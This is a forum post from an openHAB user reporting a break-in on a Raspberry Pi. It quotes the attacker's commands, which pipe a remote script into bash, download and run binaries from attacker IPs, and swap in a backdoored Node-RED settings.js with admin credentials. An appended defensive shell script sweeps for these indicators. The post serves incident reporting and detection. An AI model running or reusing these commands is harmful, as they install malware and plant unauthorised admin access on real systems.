Hello everyone,
This is just for information; my question is at the end…
Yesterday my openHAB server, running on a RasPi 4, was attacked by someone unknown, and they managed to run some commands with sudo. This happened between 20:00 and 00:00:
curl http://45.80.153.168:26/ip2.sh | bash
apt update -y; apt install curl cron nano -y; service cron start; uname -a
sudo apt update -y; sudo apt install curl cron nano -y; sudo service cron start; uname -a
cd /tmp; curl -o php http://185.28.39.15/x-8.6-.ISIS; chmod +x php; ./php; rm -rf php
cd /tmp; curl -o php http://185.28.39.15/a-r.m-6.ISIS; chmod +x php; ./php; rm -rf php
cd ~/.node-red; mv settings.js test.js; curl -o settings.js http://185.28.39.15/nodered.txt
pkill node-red | node-red
I have no idea how they managed to get in; this is something I am still trying to figure out. For now I have closed all ports on my router, and now I want to find out what was damaged.
First of all, they downloaded a script file and ran it; I have no idea what was inside, as it is not available anymore. Then they ran two files, one for x86 and one for ARM; it could be that the ARM file ran through. Those are still available.
Info about that ARM file is here: Automated Malware Analysis Report for a-r.m-6.ISIS - Generated by Joe Sandbox
No idea what that was doing; maybe I was involved in some kind of DDoS attack. I also checked the crontab entries for openhabian and for root; there are no entries there, so I have no idea why they installed cron. And they replaced my Node-RED settings; they changed these lines here:
...
    adminAuth: {
        type: "credentials",
        users: [
            {
                username: "admin",
                password: "$2b$08$O8/aEWlLrdbCkA1hAsnmZe84m3HuXNf5Qpk5W2JtcP9KAeKyb98LO",
                permissions: "*"
            },
            {
                username: "george",
                password: "$2b$08$O8/aEWlLrdbCkA1hAsnmZe84m3HuXNf5Qpk5W2JtcP9KAeKyb98LO",
                permissions: "read"
            }
        ]
    },
...
    httpNodeAuth: {user:"user",pass:"$2b$08$O8/aEWlLrdbCkA1hAsnmZe84m3HuXNf5Qpk5W2JtcP9KAeKyb98LO"},
    httpStaticAuth: {user:"user",pass:"$2b$08$O8/aEWlLrdbCkA1hAsnmZe84m3HuXNf5Qpk5W2JtcP9KAeKyb98LO"},
...
After that, my existing flows were unreadable; I had to undo the changes and re-import the backed-up flows.
So just for your information, check all your open ports and create backups…
My next question is: is it possible to run an AV scan on the openHAB system? How can I do this? I want to make sure that there are no other files left over from that operation…
Greetings Jack
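Before reaching for an AV scanner, the quickest check is to sweep the box for the indicators that are already visible in the post: the two download hosts, the bcrypt hash the attacker wrote into settings.js (the same hash for every account, i.e. one password of their choosing), and the "php" loader dropped in /tmp. The script below is an added example, not part of Jack's post or of openHAB/Node-RED; it bundles those indicators into a few POSIX sh functions and runs them against sample files that are constructed inline, so it can be tried offline. On the real Pi you would point the same functions at ~/.bash_history, /var/log/auth.log, the files under /var/spool/cron/crontabs, ~/.node-red/settings.js and /tmp. The IoC values are copied from the post; the sample history and settings content is made up for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original post): sweep for the indicators of compromise
# quoted in the post. Sample inputs are constructed here for demonstration only.

# Indicators taken from the commands and settings.js shown in the post.
IOC_HOSTS='45.80.153.168 185.28.39.15'
IOC_HASH='$2b$08$O8/aEWlLrdbCkA1hAsnmZe84m3HuXNf5Qpk5W2JtcP9KAeKyb98LO'

# Print the number of lines in file $1 that mention any attacker host.
# Useful on ~/.bash_history, /var/log/auth.log, crontab files, systemd units.
count_ioc_hosts() {
    f="$1"
    n=0
    for h in $IOC_HOSTS; do
        # grep -c prints 0 and exits 1 when nothing matches; a missing file prints nothing.
        c=$(grep -c -F "$h" "$f" 2>/dev/null || true)
        n=$((n + ${c:-0}))
    done
    echo "$n"
}

# Exit 0 if the attacker's bcrypt hash is still present in a Node-RED settings.js ($1).
settings_has_ioc_hash() {
    grep -q -F "$IOC_HASH" "$1" 2>/dev/null
}

# Exit 0 if directory $1 still contains the dropped loader named "php".
# The attacker's one-liner deletes it after running, so a hit means the
# clean-up failed or the dropper ran again (for example from a cron job).
tmp_has_dropper() {
    [ -f "$1/php" ]
}

# --- constructed sample data (not a real system) ---
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

cat > "$WORK/bash_history" <<'EOF'
ls -la
curl http://45.80.153.168:26/ip2.sh | bash
cd /tmp; curl -o php http://185.28.39.15/x-8.6-.ISIS; chmod +x php; ./php; rm -rf php
sudo reboot
EOF

cat > "$WORK/settings.js" <<'EOF'
adminAuth: {
    type: "credentials",
    users: [
        { username: "admin", password: "$2b$08$O8/aEWlLrdbCkA1hAsnmZe84m3HuXNf5Qpk5W2JtcP9KAeKyb98LO", permissions: "*" }
    ]
},
EOF

# Run the sweep on the sample data and report in plain text.
echo "history lines mentioning attacker hosts: $(count_ioc_hosts "$WORK/bash_history")"
if settings_has_ioc_hash "$WORK/settings.js"; then
    echo "settings.js still carries the attacker's credential hash: restore from backup"
fi
if tmp_has_dropper "$WORK"; then
    echo "dropper still present in $WORK"
else
    echo "no dropper binary in $WORK"
fi
```

A clean result from these checks is not proof that nothing else is left: the first script (ip2.sh) was never recovered, so anything it installed is unknown. The only way to be sure is to reflash the SD card and restore openHAB and Node-RED configuration from a backup taken before the incident, then rotate every credential that lived on the box.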